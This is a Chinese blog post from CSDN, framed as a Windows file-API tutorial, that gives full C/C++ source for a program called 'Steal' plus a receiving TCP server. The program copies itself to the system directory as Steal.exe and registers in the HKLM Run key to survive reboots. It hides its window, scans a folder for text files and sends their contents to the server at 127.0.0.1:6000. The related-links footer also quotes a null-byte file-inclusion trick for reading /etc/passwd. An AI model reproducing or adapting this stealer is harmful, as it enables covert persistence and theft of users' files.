WIN下的文件截获

已于 2024-08-11 18:19:33 修改
阅读量168 收藏 1
点赞数 5
分类专栏: Windows系统编程 文章标签: c++ windows 网络
于 2024-07-29 16:30:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nieweishan/article/details/140770538
版权

WIN下的文件操作以及注册服务

一.windows下知识

句柄

相当于指针,用来表示windows下的一些对象;

禁用某些警告

在这里插入图片描述

MAX_PATH

windows下的路径数据变量;

_WIN32_FIND_DATAW–文件结构体:

是一个结构体,用于存储 Windows 文件查找API(FindFirstFile、FindNextFile等)找到的文件信息

typedef struct
_WIN32_FIND_DATAW {
DWORD dwFileAttributes;//属性
FILETIME ftCreationTime;//创建时间
FILETIME ftLastAccessTime;//最后访问时间
FILETIME ftLastWriteTime;//最后写入时间
DWORD nFileSizeHigh;//文件大小的高位
DWORD nFileSizeLow;//文件大小的低位
DWORD dwReserved0;//保留字段
DWORD dwReserved1;//保留字段
_Field_z_ WCHAR cFileName[MAX_PATH ];//文件名
_Field_z_ WCHAR cAlternateFileName[ 14 ];//修改后的文件名
}

FindFirstFileW

是 Windows 平台上的一个 API 函数,用于查找第一个匹配指定模式的文件。这个函数在 Windows API 中用于文件和目录操作。

FindFirstFileW(
    _In_ LPCWSTR lpFileName,//一个指向要搜索的文件的名称的字符串
    _Out_ LPWIN32_FIND_DATAW lpFindFileData //一个指向用于存储找到的文件属性的变量的指针
    );

函数返回一个 WIN32_FIND_DATAW 结构,其中包含了找到的文件的属性。如果函数没有找到任何匹配的文件,它将返回 NULL。

注册到服务代码(自启动)

#include<io.h>
void AddToSystem()
{
	HKEY hKEY;
	char CurrentPath[MAX_PATH];
	char SysPath[MAX_PATH];
	long ret = 0;
	LPSTR FileNewName;
	LPSTR FileCurrentName;
	DWORD type =REG_SZ;
	DWORD size =MAX_PATH;
	LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; //regedit
	GetSystemDirectory(SysPath, size);
	GetModuleFileName(NULL, CurrentPath, size);
	//Copy File
	FileCurrentName = CurrentPath;
	FileNewName =lstrcat(SysPath, "\\Steal.exe");
	struct _finddata_t Steal;
	printf("ret1 = %d,FileNewName = %s\n", ret, FileNewName);
	if (_findfirst(FileNewName, &Steal) != -1)
		return;//已经安装!
	printf("ret2 = %d\n", ret);
	
	ret =CopyFile(FileCurrentName, FileNewName,TRUE);
	if (!ret)
	{
		return;
	}
	//加入注册表
	printf("ret = %d\n", ret);
	//打开注册表
	ret =RegOpenKeyEx(	HKEY_LOCAL_MACHINE, Rgspath, 0,KEY_WRITE, &hKEY);
	if (ret !=ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
		return;
	}
	//Set Key
	ret =RegSetValueEx(hKEY, "Steal",NULL, type, (const unsigned char*)FileNewName,size);
	if (ret !=
		ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
		return;
	}
	RegCloseKey(hKEY);
}

隐藏窗口

void Hide() {
	HWND hwnd = GetForegroundWindow();
	ShowWindow(hwnd, SW_HIDE);
}

二.客户端代码

#include<stdio.h>
#include<Windows.h>
#include<io.h>
#pragma comment(lib,"ws2_32.lib")
int SendtoServer(const char* mypath) {
	printf("TCP Client\n");
	//初始化网络库
	WORD wVersionRequested;
	WSADATA wsaData;
	int err;
	char sendBuf[1024] = {0};
	FILE* fp = fopen(mypath, "rb");
	int len = fread(sendBuf, 1, 1024, fp);
	fclose(fp);
	wVersionRequested = MAKEWORD(1, 1);
	// 初始化套接字库
	err = WSAStartup(wVersionRequested, &wsaData);
	if (err != 0)
	{
		return err;
	}
	if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
	{
		WSACleanup();
		return -1;
	}
	//创建套接字
	printf("create socket\n");
	SOCKET sockCli = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sockCli == INVALID_SOCKET) {
		printf("create socket error: %d\n", GetLastError());
		return -1;
	}
	//配置要连接的服务器
	SOCKADDR_IN addsrv;
	addsrv.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
	addsrv.sin_family = AF_INET;
	addsrv.sin_port = htons(6000);
	//连接服务器

	if (connect(sockCli, (SOCKADDR*)&addsrv, sizeof(addsrv)) == SOCKET_ERROR) {
		printf("connect error = %d \n", GetLastError());
	}
	//收发数据

	

	int iLen = send(sockCli, (char*)sendBuf, 100, 0);
	//char recvBuf[100] = { 0 };

	//iLen = recv(sockCli, recvBuf, 100, 0);

	closesocket(sockCli);
	WSACleanup();


	return 0;
}
int DoSteal(const char* szPath) {
	//1遍历szPath下的所有文件
	WIN32_FIND_DATA FindFileData;
	HANDLE hListFile;//文件句柄
	char szFilePath[MAX_PATH] = {0};
	strcpy(szFilePath, szPath);
	strcat(szFilePath, "\\*");
	//2.首先找到第一个文件
	hListFile=FindFirstFile(szFilePath,&FindFileData);
	//3.循环遍历所有文件
	do {
		char myPath[MAX_PATH] = { 0 };
		strcpy(myPath, szPath);
		strcpy(myPath, szPath);

		strcat(myPath, FindFileData.cFileName);
		if (strstr(myPath,"txt")) {
			SendtoServer(myPath);

		}
		printf("%s\n",myPath);

	} while (FindNextFile(hListFile, &FindFileData));
	return 0;
}
void Hide() {
	HWND hwnd = GetForegroundWindow();
	ShowWindow(hwnd, SW_HIDE);
}
void AddToSystem()
{
	HKEY hKEY;
	char CurrentPath[MAX_PATH];
	char SysPath[MAX_PATH];
	long ret = 0;
	LPSTR FileNewName;
	LPSTR FileCurrentName;
	DWORD type =REG_SZ;
	DWORD size =MAX_PATH;
	LPCTSTR Rgspath = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; //regedit
	GetSystemDirectory(SysPath, size);
	GetModuleFileName(NULL, CurrentPath, size);
	//Copy File
	FileCurrentName = CurrentPath;
	FileNewName =lstrcat(SysPath, "\\Steal.exe");
	struct _finddata_t Steal;
	printf("ret1 = %d,FileNewName = %s\n", ret, FileNewName);
	if (_findfirst(FileNewName, &Steal) != -1)
		return;//已经安装!
	printf("ret2 = %d\n", ret);
	
		//复制文件
	ret =CopyFile(FileCurrentName, FileNewName,TRUE);
	if (!ret)
	{
		return;
	}
	//加入注册表
	printf("ret = %d\n", ret);
	//打开注册表
	ret =RegOpenKeyEx(	HKEY_LOCAL_MACHINE, Rgspath, 0,KEY_WRITE, &hKEY);
	if (ret !=ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
		return;
	}
	//Set Key
	ret =RegSetValueEx(hKEY, "Steal",NULL, type, (const unsigned char*)FileNewName,size);
	if (ret !=
		ERROR_SUCCESS)
	{
		RegCloseKey(hKEY);
		return;
	}
	RegCloseKey(hKEY);
}

int main() {
	printf("Steal\n");
	AddToSystem();
	Hide();
	DoSteal("D:\\file\\");
	system("pause");
}

三.服务端代码

#include<Windows.h>
#include<iostream>
using namespace std;
#define MAX_SIZE 1024
#pragma comment(lib,"ws2_32.lib")
void ErreorHanding(const char*msg){
	fputs(msg, stderr);
	fputs("\n", stderr);
	system("pause");
	exit(-1);
}
int main() {
	cout << "server" << endl;
	//初始化网络库
	WORD wVersionRequested;
	WSADATA wsaData;
	int err;	
	wVersionRequested = MAKEWORD(1, 1);
	
	// 初始化套接字库
	err = WSAStartup(wVersionRequested, &wsaData);
	if (err != 0)
	{
		ErreorHanding("WSAStartup error");
	}
	if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
	{
		ErreorHanding("LOBYTE error");
		WSACleanup();
		return -1;
	}
	//创建套接字
	char msg[MAX_SIZE] = { 0 };
	SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
	if (sock == INVALID_SOCKET) {
		ErreorHanding("socket error");
	}
	SOCKADDR_IN addr;
	addr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
	addr.sin_port = htons(6000);
	addr.sin_family = AF_INET;
	if (bind(sock, (SOCKADDR*)&addr, sizeof(SOCKADDR)) == SOCKET_ERROR) {
		ErreorHanding("bind error");
	}
	if (SOCKET_ERROR == listen(sock, 6)) {
		ErreorHanding("listen error");
	}
	SOCKADDR_IN addrCli;
	int cliAddrSize = sizeof(SOCKADDR_IN);
	SOCKET cliSock;
	int Len;
	while(true){
		cliSock = accept(sock, (SOCKADDR*)&addrCli, &cliAddrSize);
		if (SOCKET_ERROR == cliSock) {
			ErreorHanding("accept error");
			
		}
		while (Len = recv(cliSock, msg, MAX_SIZE, 0) != 0) {
			printf("Server msg = %s\n", msg);
		}
		closesocket(cliSock);
	}


}
叙白大人
关注
专栏目录
WIN32_FIND_DATA 循环获取文件大小BUG
皮他爹的专栏
10-14 3313
今天在调试程序时发现一个 WIN32_FIND_DATA 的BUG,在循环读取一个文件夹下的图片文件时,发现结构体中 nFileSizeLow 和 nFileSizeHigh 值 == 0的情况,即能获取到文件名,但读出的文件大小为0的尴尬情况。但事实上,图片文件是正常的,大小从80K~170K的都有,比较诡异,与各位分享一下。    typedef struct _WIN32_FIND_DAT
[Win32]打开文件/保存文件/选择文件夹对话框
zuishikonghuan的博客
08-12 3万+
本博文由CSDN博主zuishikonghuan所作,版权归zuishikonghuan所有,转载请注明出处: 1。打开文件对话框:GetOpenFileName函数 函数原形:BOOL WINAPI GetOpenFileName( _Inout_ LPOPENFILENAME lpofn ); 参数:一个指向 OPENFILENAME 结构的指针,其中包含用于初始化对话框的信
【复习】文件包含_02_截断
qq_45300786的博客
05-22 978
文件包含截断 1、00截断法 00字符截断(php<5.3.4) (需要 magic_quotes_gpc=off) /etc/passwd /etc/passwd%00 http://include.hahahaha.com/file02.php?file=x.jpg%00 2、超长文件截断 (php版本小于5.2.8 可以成功,linux需要文件名长于4096,windows需要长于256) 利用操作系统对目录最大长度限制。 在window下256字节 linux下4096字节 截断的字符有“.
windows如何切割大文件
zhaofengdeng的博客
06-19 2万+
感谢: https://www.cnblogs.com/aarond/p/log_split_win.html 软件下载地址: https://sourceforge.net/projects/getgnuwin32/postdownload 解压。 然后执行解压后所在文件夹中的download.bat。执行完之后,执行install.bat。 不过第一次安装慢,后面就有很多li...
Windows下切分文件
热门推荐
BetterWorld的专栏
04-12 3万+
Windows下切分文件在linux下有split可以很方便的切分文件windows下cmd未找到相关命令。当然,也可以安装GnuWin32,利用现成的split命令来进行切分。但是如者二者都没有呢,又暂时不想安装GnuWin32。作为一个程序员,信奉自己动手,丰衣足食。自己写一个切分文件的脚本或者软件吧。需求来源于自己一不小心,一个服务程序跑飞了生成了一个12G的日志,俺用ue打开之,卡了5分钟
Win7、win8、win10下实现精准截获Explorer拷贝行为
浪子_三少(邮箱:basketwill@qq.com)
05-22 2536
已经发表于freebuf ( http://www.freebuf.com/column/134192.html) 在企业数据安全中我通常需要监测用户的拷贝行为,特别像explorer这样的进程,方法很多比如文件过滤驱动监测文件的打开与读写,但是这样会有很多噪音产生,实现的不好的话也可能会造成用户在桌面操作感受不良好,比如卡,所以我们需要的是一种更精准地方法,下面我们就来分析
win32判断文件是否拷贝完毕_【病毒通告】伪装成系统文件的Phorpiex木马
weixin_39630771的博客
12-12 390
尊敬的用户:您好!近日,据有关网络安全公司截获了伪装成系统文件的Phorpiex木马,Phorpiex是一种兼具蠕虫病毒和文件型病毒特性的僵尸网络病毒,能够借助漏洞利用工具包以及其他恶意软件进行传播。其主要通过投递、分发其它恶意病毒来获利,著名的Avaddon勒索病毒就是借助该僵尸网络进行投递。本次截获的Phorpiex木马将自身更名为svchost,伪装成微软系统文件,窃取用户的加密...
WIN7 下 explorer 进行的文件移动COPY HOOK
bruce135lee的专栏
07-04 852
WinXP 下通过HOOK explorer来截获用户的复制,剪切,粘贴是很容易的。只需要HOOK以下三个API:CopyFileExW, MoveFileWithProgressW, ReplaceFileW,至于 MoveFileA等函数,最终也是调用这三个函数,这点可以通过用IDA反kernel32.dll分析得来。但在WIN7下却不是这个回事了,我使用上述技术做的程序在XP下能正常使用...
博客-”深入windows的关机消息截获-从XP到Win7的变化“测试文件
01-11
这是博客“深入windows的关机消息截获-从XP到Win7的变化”的测试文件和测试日志,利用这个测试文件测试Windows的关机方案从XP到Win7到底发生了什么变化,分析得到如何进行有效的截获Windows关机消息。
Spy4Win__Win10
05-31
Spy4Win, 适用于win10的版本. ...件来源,窗口内容的读取,窗口消息截获,可视窗口 截图等). 另外还可以从可执行文件中提取窗体可 重用单元,克隆窗体/系统菜单,IE页面分析,程序 代码生成,屏幕取色,进程查看等.
Spy4Win-Win10
04-24
主要功能是探测和获取窗口的更多信息(窗口基本信息,窗口的样式描述以及动态改变窗口样式,识别控件来源,窗口类的相关信息,关系窗口的获取(父窗口/子窗口等),窗口内容的读取,窗口消息截获,可视窗口截图等)。...
Spy4_Win10.rar
07-21
Spy4Win, 适用于win10的版本. ...件来源,窗口内容的读取,窗口消息截获,可视窗口 截图等). 另外还可以从可执行文件中提取窗体可 重用单元,克隆窗体/系统菜单,IE页面分析,程序 代码生成,屏幕取色,进程查看等.
TI毫米波雷达(五)—— chirp
最新发布
slyywd的博客
11-14 741
TI的毫米波雷达可以通过定义chirp配置文件来控制一帧中的chirp参数,而且可以在chirp RAM中修改这些配置文件。Chirp配置文件可以作为基础的chirp时序模板,用来生成参数各异的chirp。TI的毫米波雷达可以接收四个不同的chirp配置文件,但是chirp可配置RAM中可以预编程512个独特的chirp。每个chirp都可以引用四个配置文件之一,然后按需要进行细调。一个帧由chirp可配置RAM中起始索引到结束索引间的chirp序列组成,最大可循环255次。
"Win7下SSH客户端连接CentOS54的SSH证书配置方法
Win7下用SSH客户端工具连接CentOS5.4的SSH证书配置方法是一种安全的网络连接方式。在传统的网络服务程序中,如FTP、POP和telnet,明文传送口令和数据的方式存在很大的安全风险,容易被不法分子截获和攻击。而SSH...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值